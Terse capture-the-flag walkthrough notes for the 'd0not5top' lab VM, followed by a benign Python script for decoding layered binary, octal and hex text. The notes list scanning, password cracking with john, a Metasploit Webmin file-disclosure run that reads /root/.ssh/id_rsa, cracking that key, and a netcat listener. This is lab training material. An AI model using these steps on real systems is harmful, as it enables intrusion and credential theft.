hack-d0not5top-vm-ctf-challenge
netdiscover
nmap -sV IP
visit the ip address
scan the web content using
dirb http://IP
check the folders - normally control, admin - and check the
source code - FLAG number 1 found = FL46_1
Binary code to be converted into decimal
netcat, very verbose
nc -vv IP
www.asciitohex.com - hexadecimal
Brainfuck encoding
splitbrain.org/services/ook
obfuscation/encoding
add the code.ctf to the /etc/hosts as
IP and filename.ctf
dirb http://g4m35.ctf/H3x6L64m3/ /usr/share/wordlists/dirb/big.txt
cryptii.com/octal/text
interpret as octal convert to text
without the \
to access another terminal - use grep* and password the ctf name
exiftool - into an image and analyze the content.
john --wordlist=/usr/share/wordlists/rockyou.txt donotstop
john --wordlist=/usr/share/wordlists/rockyou.txt ignite
ssh username@IP
rbash shell
suedoh -l
suedoh /usr/bin/wmstrt
for i in {1..9999..1};do echo $(suedoh /usr/bin/wmstrt&);done
msf > use auxiliary/admin/webmin/file_disclosure
msf auxiliary(file_disclosure) > set lhost 192.168.1.113
msf auxiliary(file_disclosure) > set ssl true
msf auxiliary(file_disclosure) > set rpath /root/.ssh/id_rsa
msf auxiliary(file_disclosure) > exploit
ssh2john id_rsa > ignite
john --wordlist:/usr/share/wordlists/rockyou.txt ignite
nc -lp 1234 -vv
http://www.hackingarticles.in/hack-d0not5top-vm-ctf-challenge/
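
The binary, hexadecimal and octal conversion steps in the notes above can be done offline instead of through the web converters. This is an added example, not part of the original notes: the function names are illustrative and the sample string is constructed. It peels stacked binary/octal/hex layers and drops the backslashes from octal input, as the notes describe.

```python
import re

def _printable(data: bytes) -> str:
    text = data.decode("ascii")  # UnicodeDecodeError is a ValueError subclass
    if not text or not all(32 <= ord(c) < 127 for c in text):
        raise ValueError("not printable ASCII")
    return text

def decode_binary(blob: str) -> str:
    bits = "".join(blob.split())
    if not bits or len(bits) % 8 or set(bits) - {"0", "1"}:
        raise ValueError("not 8-bit binary")
    return _printable(bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8)))

def decode_octal(blob: str) -> str:
    # "\106\114" and "106 114" are treated alike: the backslashes are dropped.
    groups = blob.replace("\\", " ").split()
    if not groups or not all(re.fullmatch(r"[0-3]?[0-7]{1,2}", g) for g in groups):
        raise ValueError("not octal byte groups")
    return _printable(bytes(int(g, 8) for g in groups))

def decode_hex(blob: str) -> str:
    cleaned = re.sub(r"\\x|0x|[\s:,]", "", blob)
    return _printable(bytes.fromhex(cleaned))

# Order matters: binary digits are also valid octal, octal digits are also valid hex.
DECODERS = (("binary", decode_binary), ("octal", decode_octal), ("hex", decode_hex))

def peel(blob: str, max_layers: int = 8):
    """Decode repeatedly until no decoder yields printable ASCII."""
    layers = []
    for _ in range(max_layers):
        for name, decoder in DECODERS:
            try:
                blob = decoder(blob)
            except ValueError:
                continue
            layers.append(name)
            break
        else:
            break  # nothing matched: treat what is left as plaintext
    return blob, layers

# Constructed sample: plaintext -> backslash-octal -> space-separated binary.
PLAINTEXT = "FL46_sample"
OCTAL_LAYER = "".join("\\%03o" % b for b in PLAINTEXT.encode())
SAMPLE = " ".join(format(b, "08b") for b in OCTAL_LAYER.encode())

if __name__ == "__main__":
    print(peel(SAMPLE))
```

Short inputs can be ambiguous between octal and hex (for example "50 60"), so check the reported layer order against what the challenge page actually shows.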